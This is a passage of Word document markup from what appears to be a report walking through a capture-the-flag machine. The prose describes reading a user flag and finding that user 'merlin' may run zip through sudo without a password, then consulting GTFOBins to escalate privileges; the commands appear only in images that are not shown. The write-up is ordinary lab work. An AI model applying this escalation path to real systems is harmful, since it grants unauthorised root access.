          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYWRmZmVkMDUtYTQ2My00NzQxLWFiMTQtZTdjYWU0Njg3YTVh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1701048974"/>
          <w:placeholder>
            <w:docPart w:val="E4F36745AA624AF1B0E8AAE8098079C1"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="442"/>
      <w:bookmarkEnd w:id="443"/>
      <w:bookmarkEnd w:id="444"/>
    </w:p>
    <w:p w14:paraId="6924809C" w14:textId="77777777" w:rsidR="00226461" w:rsidRDefault="00226461" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDE6AA5" w14:textId="1570E089" w:rsidR="00B40DEF" w:rsidRDefault="00B40DEF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>When listing the files i</w:t>
      </w:r>
      <w:r w:rsidR="008C2D21">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>user ‘m</w:t>
      </w:r>
      <w:r w:rsidR="008C2D21">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>erlin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">’ a user.txt file can be seen (figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049FD80C" w14:textId="4161CAE6" w:rsidR="008C2D21" w:rsidRDefault="00B40DEF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2D21">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A7D4DEA" wp14:editId="03F983DD">
            <wp:extent cx="4106545" cy="934170"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="760259204" name="Picture 7602592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04" name="Picture 760259204" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId130">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2630" t="3532" r="13345" b="29703"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4106545" cy="934170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB19FFC" w14:textId="357A9820" w:rsidR="00B40DEF" w:rsidRDefault="00B40DEF" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="445" w:name="_Toc111363678"/>
      <w:bookmarkStart w:id="446" w:name="_Toc111363815"/>
      <w:bookmarkStart w:id="447" w:name="_Toc111981838"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>113</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Merlin List Directory </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYThkNGYzYjAtMjU5Mi00MWRjLWI3NGItNDEwMmFiMWUxMTNm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1452700396"/>
          <w:placeholder>
            <w:docPart w:val="E72DEEFACCD04F38BC6593CC22719A48"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="445"/>
      <w:bookmarkEnd w:id="446"/>
      <w:bookmarkEnd w:id="447"/>
    </w:p>
    <w:p w14:paraId="70075600" w14:textId="443D6CF6" w:rsidR="008C2D21" w:rsidRDefault="008C2D21" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2D21">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E86028" w14:textId="3196DE4A" w:rsidR="008C2D21" w:rsidRDefault="00083372" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The ‘cat’ command is used again to see the text inside the file as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. The first flag has been found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538E0ED3" w14:textId="70B3383B" w:rsidR="00EB6712" w:rsidRDefault="008C2D21" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2D21">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61E4BCB0" wp14:editId="4B4C22DA">
            <wp:extent cx="2377440" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="760259205" name="Picture 76025920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05" name="Picture 760259205" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId131"/>
                    <a:srcRect l="2203" t="55778" r="53614" b="10365"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2380515" cy="534090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26812B97" w14:textId="7364D831" w:rsidR="00083372" w:rsidRDefault="00083372" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="448" w:name="_Toc111363679"/>
      <w:bookmarkStart w:id="449" w:name="_Toc111363816"/>
      <w:bookmarkStart w:id="450" w:name="_Toc111981839"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>114</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: User-txt</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYjY0Y2MwMzUtYjZmOC00ZjRhLTk4YjktZDhkZGJmMDlhYjg0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1330328573"/>
          <w:placeholder>
            <w:docPart w:val="557368C1287E4D17BE989CE96B47CFB4"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="448"/>
      <w:bookmarkEnd w:id="449"/>
      <w:bookmarkEnd w:id="450"/>
    </w:p>
    <w:p w14:paraId="09662FF0" w14:textId="04BEFDDE" w:rsidR="009D0FD1" w:rsidRDefault="009D0FD1" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1DD8F5" w14:textId="77FEE363" w:rsidR="00EB6712" w:rsidRDefault="00EB6712" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Merlin </w:t>
      </w:r>
      <w:r w:rsidR="00083372">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">is then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">checked for </w:t>
      </w:r>
      <w:r w:rsidR="00083372">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="00083372">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges</w:t>
      </w:r>
      <w:r w:rsidR="00083372">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> and because it can run ‘NOPASSWD /usr/bin/zip’, GTFOBins is searched for a Unix binary that can bypass local security restrictions (figures </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00083372">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00083372">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CCE2B4" w14:textId="0B45E165" w:rsidR="00EB6712" w:rsidRDefault="00EB6712" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB6712">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BE7C5DF" wp14:editId="3E4A4AB8">
            <wp:extent cx="5501228" cy="1136821"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
            <wp:docPr id="760259207" name="Picture 76025920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07" name="Picture 760259207" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId132"/>
                    <a:srcRect r="4018" b="20397"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5501228" cy="1136821"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E48ADA" w14:textId="07592FC3" w:rsidR="00083372" w:rsidRDefault="00083372" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="451" w:name="_Toc111363680"/>
      <w:bookmarkStart w:id="452" w:name="_Toc111363817"/>
      <w:bookmarkStart w:id="453" w:name="_Toc111981840"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>115</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Looking for Sudo Privileges</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNDA2MzVkMWItMTE0YS00YjFjLTliZDYtZDY4OTVhY2Q3ODQy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367070120"/>
          <w:placeholder>
            <w:docPart w:val="3EFBBE7E0F354F4B83CAAA47A1DE07B4"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="451"/>
      <w:bookmarkEnd w:id="452"/>
      <w:bookmarkEnd w:id="453"/>
    </w:p>
    <w:p w14:paraId="5C31C164" w14:textId="77777777" w:rsidR="00083372" w:rsidRDefault="00083372" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28178B77" w14:textId="3165D6EB" w:rsidR="00EB6712" w:rsidRDefault="0029584F" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0029584F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
